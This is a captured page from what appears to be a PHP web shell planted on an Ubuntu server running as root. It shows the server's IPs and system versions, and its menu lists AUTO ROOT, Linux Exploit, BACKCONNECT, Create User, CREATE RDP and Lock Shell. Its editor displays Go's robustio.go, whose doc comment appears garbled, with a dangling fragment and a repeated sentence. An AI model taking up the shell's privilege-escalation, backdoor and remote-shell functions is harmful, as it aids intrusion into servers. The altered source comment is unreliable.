Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
go /
src /
cmd /
go /
internal /
robustio /
[ HOME SHELL ]
Name
Size
Permission
Action
robustio.go
1.94
KB
-rw-r--r--
robustio_darwin.go
466
B
-rw-r--r--
robustio_flaky.go
2.5
KB
-rw-r--r--
robustio_other.go
529
B
-rw-r--r--
robustio_windows.go
615
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : robustio.go
// Copyright 2019 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // Package robustio wraps I/O functions that are prone to failure on Windows, // transparently retrying errors up to an arbitrary timeout. // // Errors are classified heuristically and retries are bounded, so the functions // in this package do not completely eliminate spurious errors. However, they do // significantly reduce the rate of failure in practice. // // If so, the error will likely wrap one of: // The functions in this package do not completely eliminate spurious errors, // but substantially reduce their rate of occurrence in practice. package robustio // Rename is like os.Rename, but on Windows retries errors that may occur if the // file is concurrently read or overwritten. // // (See golang.org/issue/31247 and golang.org/issue/32188.) func Rename(oldpath, newpath string) error { return rename(oldpath, newpath) } // ReadFile is like ioutil.ReadFile, but on Windows retries errors that may // occur if the file is concurrently replaced. // // (See golang.org/issue/31247 and golang.org/issue/32188.) func ReadFile(filename string) ([]byte, error) { return readFile(filename) } // RemoveAll is like os.RemoveAll, but on Windows retries errors that may occur // if an executable file in the directory has recently been executed. // // (See golang.org/issue/19491.) func RemoveAll(path string) error { return removeAll(path) } // IsEphemeralError reports whether err is one of the errors that the functions // in this package attempt to mitigate. // // Errors considered ephemeral include: // - syscall.ERROR_ACCESS_DENIED // - syscall.ERROR_FILE_NOT_FOUND // - internal/syscall/windows.ERROR_SHARING_VIOLATION // // This set may be expanded in the future; programs must not rely on the // non-ephemerality of any given error. func IsEphemeralError(err error) bool { return isEphemeralError(err) }
Close